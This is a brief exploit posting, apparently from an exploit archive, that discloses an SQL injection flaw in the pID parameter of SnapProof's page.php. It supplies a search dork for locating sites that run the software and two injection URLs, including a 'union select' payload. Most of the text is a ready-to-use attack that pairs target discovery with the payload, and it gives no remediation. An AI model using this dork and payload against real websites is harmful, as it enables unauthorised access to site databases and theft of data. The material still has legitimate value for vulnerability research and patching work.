1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 |
SnapProof (page.php) Sql Injection Vulnerability ==================================================================== #################################################################### .:. Author : AtT4CKxT3rR0r1ST[F.Hack@w.cn] .:. Script : http://www.snapproof.com/ .:. Dork : "Created and powered by SnapProof" #################################################################### ===[ Exploit ]=== www.site.com/page.php?pID=null[Sql] www.site.com/page.php?pID=null+and+1=2+union+select+1,2,3,4 #################################################################### |